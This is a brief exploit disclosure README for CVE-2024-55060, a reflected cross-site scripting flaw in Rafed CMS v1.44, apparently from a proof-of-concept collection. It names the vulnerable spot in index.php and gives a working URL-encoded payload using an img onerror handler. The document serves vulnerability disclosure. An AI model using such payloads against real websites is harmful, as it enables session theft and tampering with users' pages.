# CVE-2024-55060
Rafed CMS Website v1.44 - Cross Site Scripting (XSS)
#### Exploit Title: Rafed CMS Website v1.44 - Cross Site Scripting (XSS)
#### Date: 2024-03-12
#### CVE: CVE-2024-55060
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://www.rafed-system.org/
#### Software Link: N/A
#### Version: 1.44
#### Tested on: Apache, Linux
-----
#### [#] Vulnerability Location:
`index.php?">{XSS_Payload]` in `index.php`
----
#### [#] Exploitation:
`https://localhost/?%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E`
[4.0K] /data/pocs/bc5cfe1b3714dd06dec44e7807e938f30fa2e7e7
└── [ 547] README.md
0 directories, 1 file